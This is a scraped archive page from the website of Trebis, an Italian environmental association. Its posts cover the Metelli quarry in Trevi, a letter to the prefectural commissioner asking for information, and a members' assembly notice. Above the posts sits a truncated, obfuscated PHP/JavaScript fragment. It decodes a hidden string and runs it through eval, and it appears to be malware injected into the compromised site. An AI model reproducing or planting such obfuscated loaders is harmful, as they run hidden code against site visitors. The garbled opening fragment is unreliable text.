q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for the 'Atti e documenti' Category

Aggiornamento sulla cava di Metelli

admin Febbraio 16th, 2013

Cari Soci

               Il Commissario Prefettizio, Dr Angelo Gallo Carrabba, mi ha convocato questa settimana per chiarire gentilmente un punto rimasto in sospeso dopo il colloquio avutosi il 17 gennaio con membri del consiglio della Trebis. Dopo aver compiuto delle ricerche, mi ha detto, ha potuto stabilire che la cava Metelli è legalmente una cava attiva, e che la nostra impressione che fosse stata dichiarata una cava dismessa era probabilmente dovuta a un malinteso. L’attuale proroga del contratto per scavare scade nel settembre di quest’anno, ma nel caso che la quantità di materiale da estrarre prevista nel contratto non fosse ancora esaurita, dovrà essere concessa un’ulteriore proroga di due anni. Per quanto riguarda le richieste della ditta 1) di poter scavare più in basso del previsto, e 2) di ampliare la zona estrattiva, ancora non si è deciso. Gli accertamenti necessari per la seconda richiesta impegneranno molto tempo - un anno o forse un anno e mezzo.   Cordiali saluti, Patricia

Lettera al commissario prefettizio sulla cava Metelli

admin Luglio 9th, 2012

Cari soci
preoccupato dalle varie attività poco chiare intorno alla cava Metelli, il consiglio della Trebis ha mandato una lettera a Dott. Angelo Gallo Carabba, commissario prefettizio, chiedendo informazioni e documenti relativi alla Cava. Ecco il testo della nostra lettera:

Egr. Sig. Commissario,

La Trebis Onlus è un’Associazione sorta alcuni anni fa con il sostegno di un centinaio di membri, che si è assunta il compito di diffondere tra gli abitanti e i residenti di Trevi l’importanza della preservazione ambientale e paesaggistica della cittadina, senza rinunciare ad un equilibrato sviluppo economico dell’intero territorio comunale.

L’Associazione Trebis, nell’ambito delle finalità previste dallo Statuto, di cui si allega copia, vista la persistente attività estrattiva della Cava Metelli il località Scoppeto confermata dall’uso giornaliero di sostanze esplosive per l’estrazione di materiali di cava, chiede che vengano fornite informazioni scritte sui seguenti punti :

A) La conoscenza esatta delle procedure adottate a seguito della Delibera del Consiglio Comunale N.3 del 25/02/2011, relativa alla richiesta di ampliamento del sito su cui implementare l’attività estrattiva da parte della Ditta Metelli S.p.A.;

B) I controlli posti in essere relativi all’impatto ambientale della suddetta richiesta di ampliamento e l’eventuale esistenza di vincoli ambientali (nazionali e regionali) su tale territorio;

C) La quantità del materiale estratto dal 2009 ad oggi in relazione alla normativa regionale vigente;

D) I controlli effettuati a mezzo del tecnico incaricato in base alla convenzione fra il Comune di Trevi e la Ditta Metelli del 1993 o successive, il tutto con dati numerici e date;

E) La persistenza o meno della c.d. “escavazione a pozzo”;

F) L’uso di materiali esplosivi;

G) L’ammontare della quota per tonnellata che il Comune di Trevi riceve dalla ditta escavatrice;

H) L’adempimento dei controlli sulla emissione di polveri in relazione alla salute dei cittadini;

I) Si chiede inoltre il rilascio delle copie delle autorizzazioni e delle convenzioni in possesso della S.p.A. Metelli per lo sfruttamento della cava in questione.

Sicuri della Sua attenzione a soddisfare le richieste dell’Associazione e disponibili ad un eventuale incontro, La ringraziamo anticipatamente e porgiamo i più cordiali saluti.

Assemblea del giorno 11 novembre - rinnovo consiglio direttivo

admin Novembre 8th, 2011

Cari Soci

E’ convocata per venerdì 11 novembre 2011 alle ore 21, nella sala dell’impresa Olio Trevi (dietro il Cityper di piazza Umbria) gentilmente messa a nostra disposizione dal socio Angelo Guidobaldi, l’assemblea dei soci per il rinnovo del consiglio direttivo.

Invito tutti i soci a partecipare a questo importante evento, ricordando che è possibile, in caso di assenza, dare la delega ad altro socio che parteciperà all’assemblea.

Vi prego di estendere l’invito anche a quanti possono attivamente impegnarsi nell’Associazione. Sarebbe auspicabile, infatti, allargare il numero dei soci avvicinando quei cittadini di Trevi sensibili alla tutela del paesaggio, delle bellezze storico artistiche e delle tradizioni di questo nostro territorio.

Il tesseramento di nuovi soci ed il regolare pagamento della quota annuale da parte dei vecchi soci ci consentirebbe anche di recuperare risorse finanziarie, che per una associazione di volontari quale la Trebis sono fondamentali per la sopravvivenza.

I soci che intendono candidarsi o proporre nominativi per il consiglio direttivo possono usare il nostro sito web www.trebisonlus.it oppure rivolgersi direttamente alla sottoscritta (tel. 0742 381206).

L’iniziativa che si è tenuto lo scorso sabato 5 novembre – che ha registrato successo di pubblico e notevole interesse – conclude il lavoro svolto in questi anni dal consiglio direttivo uscente, che si è occupato in particolare modo del nuovo strumento urbanistico adottato dalla precedente amministrazione comunale: dopo aver fatto una assemblea degli iscritti su questo tema, Trebis ha presentato al Comune le osservazioni al PRG, purtroppo respinte in gran parte. Abbiamo condotto anche una campagna di sensibilizzazione, in più fasi, con manifesti, sulla tutela del nostro territorio, ed avanzato varie proposte all’Amministrazione comunale su arredo urbano, trasparenza, situazione idrogeologica, chiusura al traffico di piazza Mazzini. Abbiamo continuato a vigilare sulle ex serre, per le quali ormai è stato abbandonato il velleitario progetto di mega villaggio turistico, sostituito purtroppo dal progetto di un mega parco fotovoltaico, così come abbiamo continuato a monitorare l’attività estrattiva presente nell’ambito comunale.

Il lavoro da fare è ancora molto, però sono fiduciosa che, con il contributo dei soci che si renderanno disponibili ad impegnarsi nel nuovo direttivo, la Trebis potrà continuare a svolgere un ruolo propositivo per la salvaguardia delle bellezze del nostro territorio.

Ci vediamo tutti venerdì sera! Un cordiale saluto.

Patricia Clough

Presidente